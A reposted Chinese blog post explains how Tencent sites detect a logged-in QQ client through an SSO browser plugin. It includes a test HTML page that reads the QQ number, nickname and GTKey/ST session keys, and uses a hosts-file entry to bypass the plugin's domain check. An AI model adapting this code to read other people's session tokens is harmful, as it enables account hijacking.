1. 程式人生 > >騰訊的網站如何檢測到你的 QQ 已經登入?

騰訊的網站如何檢測到你的 QQ 已經登入?

在 QQ 已經登入的情況下,手動輸入網址開啟 QQ 郵箱 或者 QQ 空間 等騰訊網站,可以看到網頁已經檢測到本地 QQ 客戶端已經登入,於是使用者可以很方便地一鍵登入網站而不必再輸入使用者名稱密碼。這實際上是典型的異構系統單點登入 SSO(single-sign-on)技術。網頁怎麼會知道我登入的 QQ 號碼?騰訊是如何實現的呢?

Qzone_AutoLogin

QQMail_AutoLogin

網上有很多猜測,比如——

  • QQ 登入時在本地某地方存登入 ID 資訊(Cookie 或檔案),用 js 讀,然後去伺服器認證。但是現在的瀏覽器一般有沙箱功能,js 無法讀到登入 ID;而且在清空 Cookie 後依然起作用。
  • 以 IP、CPU ID、硬碟 ID 等硬體裝置 hash 做唯一標識,QQ 登入時在伺服器記錄此資訊,js 驗證。感覺這樣依賴環境過多,QQ 不太可能採用此方法。
  • QQ 啟動某埠監聽,js 連線此埠。但是用 netstat 檢視後,QQ 並沒有監聽埠。

有這麼一個神奇的連結,http://xui.ptlogin2.qq.com/cgi-bin/qlogin你一點開,它就檢測到你登入了 QQ。通過檢視頁面原始碼,我們可以發現一個關於 ptlogin 的 js檔案,這段程式碼中,描述了使用 ActivexObject 瀏覽器外掛的過程,於是一切瞭然。

可是 ActiveX 是 IE 的外掛呀,我們使用 Chrome 或者 FireFox 也是可以直接登入的,這是怎麼回事呢?

原來,QQ 使用了歷史很悠久的 NPAPI(Netscape Plugin Application Programming Interface)介面。NPAPI 幾乎支援所有主流瀏覽器,包括 FireFox、Chrome、Opera(IE 從 5.5 後停止支援 NPAPI,轉而使用 ActiveX)。

開啟 chrome://plugins/ 我們可以發現自動登入的有關外掛,而在路徑 C:\Program Files (x86)\Common Files\Tencent\TXSSO 下就可以找到關於 SSO 的相關動態連結庫。

Tencent_SSO_plugin

np 外掛一般命名都會加np字首 如 QQ 的這個 npSSOAxCtrlForPTLogin.dll,只要按照標準的寫法,放在瀏覽器會載入的地方,用的時候寫個標籤就可以在 js 裡面呼叫了。於是跨瀏覽器(無視 IE)的外掛開發變得相當可行。執行在 NPAPI 外掛中的程式碼擁有當前使用者的所有許可權,不在沙箱中執行,所以它的擴充套件程式在被 Chrome 網上應用店接受前要求人工稽核。

有點不懷好意的想法開始萌生,我自己的網站能否借用這個外掛來檢測使用者的 QQ 登入呢?寫個頁面測試一下。

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Tencent SSO Testing</title>
</head>
<body>
<script>
var g_vOptData;
var mylocation= "xui.ptlogin2.qq.com/cgi-bin1/qlogintest.html";
var pt = {
 ishttps: false,
 low_login: 0,
 keyindex: 9,
 init: function()
 {
  pt.ishttps = /^https/.test(mylocation);
  //if (navigator.mimeTypes["application/nptxsso"]) {
  var B = document.createElement("embed");
  B.type = "application/nptxsso";
  B.style.width = "0px";
  B.style.height = "0px";
  document.body.appendChild(B);
  pt.sso = B
 }
};
pt.init();
 
try {
 if (window.ActiveXObject)
 {
  q_hummerQtrl = new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");
  var A = q_hummerQtrl.CreateTXSSOData();
  q_hummerQtrl.InitSSOFPTCtrl(0, A);
  g_vOptData = q_hummerQtrl.CreateTXSSOData()
 }
 hummer_loaduin();
} catch(B) {
 alert(/create ActiveXObject failed/)
}
 
function hummer_loaduin()
{
 if (window.ActiveXObject)
 {
  var Y = q_hummerQtrl.DoOperation(1, g_vOptData);
  if (null == Y) {
   return
  }
  try
  {
   var T = Y.GetArray("PTALIST");
   var c = T.GetSize();
   var X = "";
   for (var d = 0; d < c; d++)
   {
    var E = T.GetData(d);
    var a = E.GetDWord("dwSSO_Account_dwAccountUin");
    var J = "";
    var O = E.GetByte("cSSO_Account_cAccountType");
    var b = a;
    if (O == 1)
    {
     try
     {
      J = E.GetArray("SSO_Account_AccountValueList");
      b = J.GetStr(0)
     } catch(Z) {}
    }
    var Q = 0;
    try {
    Q = E.GetWord("wSSO_Account_wFaceIndex")
    } catch(Z) {
    Q = 0
    }
    var S = "";
    try {
    S = E.GetStr("strSSO_Account_strNickName")
    } catch(Z) {
    S = ""
    }
    var F = E.GetBuf("bufGTKey_PTLOGIN");
    var G = E.GetBuf("bufST_PTLOGIN");
    var N = "";
    var A = G.GetSize();
    for (var W = 0; W < A; W++) {
    var B = G.GetAt(W).toString("16");
    if (B.length == 1) {
    B = "0" + B
    }
    N += B
    }
    var M = {
     uin: a,
     name: b,
     type: O,
     face: Q,
     nick: S,
     key: N
    };
    var str = "QQinfo\r\n"+
        "uin:" + M['uin']+"\r\n"+
        "name:"+M['name']+"\r\n"+
        "type:"+M['type']+"\r\n"+
        "face:"+M['face']+"\r\n"+
        "nick:"+M['nick']+"\r\n"+
        "key:"+M['key']+"\r\n";
    alert(str);
    q_aUinList[d] = M
   }
  } catch(Z) {}
  } else
  {
  try {
   var M = pt.sso;
   var L = M.InitPVA();
   if (L != false)
   {
    var I = M.GetPVACount();
    for (var W = 0; W < I; W++)
    {
     var C = M.GetUin(W);
     var D = M.GetAccountName(W);
     var K = M.GetFaceIndex(W);
     var U = M.GetNickname(W);
     var P = M.GetGender(W);
     var V = M.GetUinFlag(W);
     var f = M.GetGTKey(W);
     var R = M.GetST(W);
    }
    var str = "QQinfo\r\n"+
        "uin:" + C +"\r\n"+
        "name:"+D+"\r\n"+
        "face:"+K +"\r\n"+
        "nick:"+U+"\r\n"+
        "key:"+f+"\r\n";
    alert(str);
   }
  } catch(Z) {}
  }
 
}
</script>
</body>
</html>

本地開啟此頁面,create ActiveXObject 失敗。騰訊必然在 dll 中就對域名進行了限制,網頁是無法篡改的。於是修改本地host檔案,加一條:

127.0.0.1 xui.ptlogin2.qq.com

再用 xui.ptlogin2.qq.com 這個域名去訪問本地的這個 html,果然,可以正常拿到 QQ 相關資訊。

PS. Chrome 瀏覽器自帶的開發者工具有一個功能可以格式化被壓縮的 js 程式碼,十分好用。廢話不多說,有圖說明一切——

pretty_print_js_google_chrome